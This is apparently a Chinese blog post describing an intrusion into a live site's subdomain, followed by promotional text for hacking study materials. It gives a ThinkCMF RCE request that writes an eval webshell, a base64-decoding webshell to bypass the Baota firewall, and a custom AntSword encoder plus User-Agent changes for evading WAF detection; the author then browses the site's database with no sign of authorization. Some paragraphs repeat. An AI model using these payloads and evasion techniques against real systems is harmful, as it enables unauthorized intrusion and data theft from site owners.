0x00 信息收集
由于主站存在云waf 一测就封 且初步测试不存在能用得上的洞 所以转战分站 希望能通过分站获得有价值的信息
这是一个查询代理帐号的站 url输入admin 自动跳转至后台
看这个参数 猜测可能是thinkCMF
0x01 getshell
thinkcmf正好有一个RCE 可以尝试一下
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test1.php','<?php @eval($_POST[zero])?>')</php>
白屏是个好兆头 应该是成功了
访问一下
尝试蚁剑连接 直接报错 猜测可能遇到防火墙了
然后再回来看一下shell 手动尝试一个phpinfo
果然存在宝塔防火墙
0x02 绕过宝塔防火墙
宝塔应该对部分函数进行了过滤,所以直接传递payload肯定是不行的,所以我们需要对流量进行混淆加密。
尝试将所有的payload Base64编码传输
既然传过去的是编码后的Base64,小马也应该相应做出改变,只需解密一次传递过来的base64即可。
小马如下:
<?php @eval(base64_decode($_POST[zero]));?>将phpinfo();base64编码为 cGhwaW5mbygpOw==
发送
可见 宝塔防火墙没再拦截 已经成功绕过宝塔防火墙
0x03 改造蚁剑
我们用到的是Base64编码,但是蚁剑其实是自带Base64编码解码器的 。
尝试直接使用自带的Base64编码器
为什么会这样呢?
我们尝试从蚁剑的流量分析
设置代理到burp
拦截流量
我们可以看到 明显有两个地方容易被waf识别
一是:User-Agent头的关键字:antSword/v2.1 这相当于直接告诉waf我是谁了, 所以这是第一个要更改的点
二是:蚁剑的流量其实还是有关键字的 比如cmd参数后的 eval base64_decode 都是,而且我们的小马自带Base64解密,所以用它的默认编码器不仅过不去waf 即使没waf也不能正常连接我们的小马,所以需要自己定义编码器。
新建PHP编码器
由于我们只需要将payloadBase64编码一次即可,所以直接将data['_']Base64 处理赋值即可 随机参数有没有无所谓的
编码器如下
'use strict';
/*
* @param {String} pwd 连接密码
* @param {Array} data 编码器处理前的 payload 数组
* @return {Array} data 编码器处理后的 payload 数组
*/
module.exports = (pwd, data, ext={}) => {
data[pwd] = Buffer.from(data['_']).toString('base64');
delete data['_'];
return data;
}
然后修改UA头
应用我们的编码器 解码器不需要指定 默认即可
建议选择 增加垃圾数据和Multipart发包
再次测试连接
然后点击目录 发现依然存在问题 不能跨目录 这个问题其实哥斯拉可以解决 上传哥斯拉马
这里可能有人会问了 那你直接上传哥斯拉马不就行了吗 实际情况是 get传参有长度限制 而且有的符号会导致截断php文件无法上传完整
网站有挺多 但是很可惜没有主站 数据库里只有一堆代理帐号 浪费时间了
不能跨目录 这个问题其实哥斯拉可以解决 上传哥斯拉马
这里可能有人会问了 那你直接上传哥斯拉马不就行了吗 实际情况是 get传参有长度限制 而且有的符号会导致截断php文件无法上传完整
[外链图片转存中…(img-Xnpja9Uv-1716779844584)]
网站有挺多 但是很可惜没有主站 数据库里只有一堆代理帐号 浪费时间了
关于黑客&网络安全学习指南
学好 网络安全不论是就业还是做副业赚钱都不错,但要学会 网络安全 还是要有一个学习规划。最后给大家分享一份全套的 网络安全学习资料,给那些想学习网络安全的小伙伴们一点帮助!
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础等教程,带你从零基础系统性的学好网络安全。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.网络安全视频教程600集和配套电子书
观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
温馨提示:篇幅有限,已打包文件夹,获取方式在:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
3.技术文档
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
![[HDCTF 2023]爬过小山去看云(HILL密码,云影密码)](https://img-blog.csdnimg.cn/direct/6d36c07c411a416280309f124d8ed3a2.png)
